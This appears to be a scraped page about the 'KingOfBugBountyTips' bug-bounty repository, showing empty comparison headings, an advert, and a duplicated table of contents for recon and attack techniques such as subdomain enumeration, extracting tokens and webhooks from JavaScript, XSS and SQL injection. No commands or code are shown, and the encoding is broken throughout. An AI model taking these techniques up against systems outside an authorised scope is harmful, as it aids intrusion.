ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ

Made with â¤ï¸ by the Bug Bounty Community

Top Related Projects

Convert designs to code with AI

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

Top Related Projects

Quick Overview

Pros

Cons

Getting Started

Competitor Comparisons

Pros of Resources-for-Beginner-Bug-Bounty-Hunters

Cons of Resources-for-Beginner-Bug-Bounty-Hunters

Code Comparison

Summary

Pros of bugbounty-cheatsheet

Cons of bugbounty-cheatsheet

Code Comparison

Pros of bug-bounty-reference

Cons of bug-bounty-reference

Code comparison

Summary

Pros of Awesome-Bugbounty-Writeups

Cons of Awesome-Bugbounty-Writeups

Code Comparison

Summary

Pros of awesome-bug-bounty

Cons of awesome-bug-bounty

Code comparison

Pros of public-bugbounty-programs

Cons of public-bugbounty-programs

Code Comparison

Convert designs to code with AI

README

KingOfBugBountyTips

DoD VDP Scope

Security Notice

â Permitted Use Cases

â Prohibited Activities

ð Responsible Disclosure Guidelines

ð Report Security Issues

ð Table of Contents

ð¯ About

ð What Makes This Repository Special?

ð¦ Special Resources

ð Repository Highlights

ð Quick Start

â¡ Get your first recon running in under 5 minutes

1ï¸â£ Install Tools

2ï¸â£ Run Recon

3ï¸â£ Find Bugs

ð¯ Pro Tips for Beginners

ð ï¸ Required Tools

Core Tools

System Dependencies

Go Environment Setup

Quick Install Script - Go Tools

Quick Install Script - Python Tools

Quick Install Script - Rust Tools (Feroxbuster)

Quick Install Script - External Tools

Master Install Script (All-in-One)

Wordlists Installation

Verify Installation

ð¯ BBRF Scope DoD

ð Subdomain Enumeration â ï¸

ð Multi-Source Discovery (All-in-One)

ð Certificate Transparency Logs

ð Certstream Real-Time Monitoring - Basic

ð Certstream with Domain Filter

ð Certstream to Subdomain Discovery

ð Certstream + httpx Live Pipeline

ð Certstream Phishing Detection

ð Certstream with Nuclei Auto-Scan

ð Certstream Mass Collector Script

ð Certstream Wildcard Certificate Hunter

ð Certstream + Shodan Enrichment

ð Certstream JSON Logger with Timestamp

ð Certstream Bug Bounty Scope Monitor

ð Shodan + Nuclei Pipeline

ð ASN Discovery & Reverse DNS

ð DNS Bruteforce with Shuffledns

ð Recursive Subdomain Enum

ð Passive DNS - Multiple Sources

ð GitHub Subdomain Scraping

ð Censys Subdomain Discovery

â Permitted Use Cases

â Prohibited Activities

ð Responsible Disclosure Guidelines

ð Report Security Issues

ð Table of Contents

ð¯ About

ð What Makes This Repository Special?

ð¦ Special Resources

ð Repository Highlights

ð Quick Start

â¡ Get your first recon running in under 5 minutes

1ï¸â£ Install Tools

2ï¸â£ Run Recon

3ï¸â£ Find Bugs

ð¯ Pro Tips for Beginners

ð ï¸ Required Tools

ð¯ BBRF Scope DoD

ð Subdomain Enumeration â ï¸

ð Multi-Source Discovery (All-in-One)

ð Certificate Transparency Logs

ð Certstream Real-Time Monitoring - Basic

ð Certstream with Domain Filter

ð Certstream to Subdomain Discovery

ð Certstream + httpx Live Pipeline

ð Certstream Phishing Detection

ð Certstream with Nuclei Auto-Scan

ð Certstream Mass Collector Script

ð Certstream Wildcard Certificate Hunter

ð Certstream + Shodan Enrichment

ð Certstream JSON Logger with Timestamp

ð Certstream Bug Bounty Scope Monitor

ð Shodan + Nuclei Pipeline

ð ASN Discovery & Reverse DNS

ð DNS Bruteforce with Shuffledns

ð Recursive Subdomain Enum

ð Passive DNS - Multiple Sources

ð GitHub Subdomain Scraping

ð Censys Subdomain Discovery

ð SecurityTrails API

ð Wayback Machine Subdomains

ð CommonCrawl Extraction

ð VirusTotal Subdomains

ð DNS Zone Transfer Attempt

ð Reverse IP Lookup

ð BGP/ASN Range Scanner

ð PTR Records from IP Range

ð All-in-One Mega Oneliner

ð Subdomain Permutation/Bruteforce

ð DNS Wordlist Bruteforce with PureDNS

ð TLS/SSL Certificate Grabber

ð Favicon Hash -> Shodan

ð Google Dork Subdomain Discovery

ð JavaScript Recon

ð Extract GraphQL Endpoints from JS

ð Extract JWT Tokens from JS Files

ð Find Webpack Source Maps

ð Extract Discord Webhooks from JS

ð Find Hidden Admin Routes in JS

ð XSS Detection

ðï¸ SQL Injection